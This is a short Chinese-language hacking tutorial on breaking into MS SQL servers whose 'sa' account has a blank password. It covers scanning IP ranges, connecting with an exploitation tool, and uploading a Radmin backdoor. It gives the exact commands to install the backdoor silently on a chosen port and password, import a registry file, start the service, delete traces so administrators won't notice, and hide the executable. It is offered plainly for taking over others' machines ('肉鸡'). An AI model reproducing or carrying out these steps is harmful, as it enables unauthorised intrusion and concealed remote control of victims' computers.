sa空口令入侵

准备工具: Windows NT/2000 自动攻击探测机
        SQL综合利用工具
         radmin服务端
         Radmin影子版3.2
（1）   打开Windows NT/2000 自动攻击探测机,作简单的设置.
（2）  在"netbios"中,勾上"列出所有简单的管理员帐号",在"SQL漏洞"中勾上"列出密码为空的SA帐号".
（3）  再在起始IP和结束IP中填入要探测的IP.开始扫描.打开SQL综合利用工具的"SQL服务器设置".输入刚才的IP,点确定,一会儿便连接成功
（4）  打开"利用目录"执行一下DOS命令,如果是windows,则是XP系统或其它系统,这样的系统一般上传后门或服务端不会成功的.我们只要2000系统.（能听懂吧~~~~~~）
（5）现在开始上传radmin服务端,先上传r_server.其它的aaa.reg,admkll.dll类似.radmin服务端全部上传后,执行一下dir 命令,看看是不是真的成功了~（什么？没成功。那是见鬼了~~~~哈）
我们现在开装.安装命令如下
r_server /install /silence    （  安装r_server ）   
r_server.exe /port:4848 /pass:3407 /save /silence   （  把端口定为4848,密码为3407  ）        
regedit.exe /s aaa.reg           （    把aaa.reg 导入肉鸡的注册表   ）
net start r_server        （    启动r_server    ）
del aaa.reg              （为了防止让细心的管理员知道,删除用户名。要是比较菜的管理员就不用了。哈哈）
attrib.exe +h r_server.exe         （   隐藏r_server.exe  ）
最后打开 Radmin的控制端,输入IP,设定的端口,这儿是4848,点确定
输入密码,成功了。。这样就可以看到了肉鸡的屏幕！！！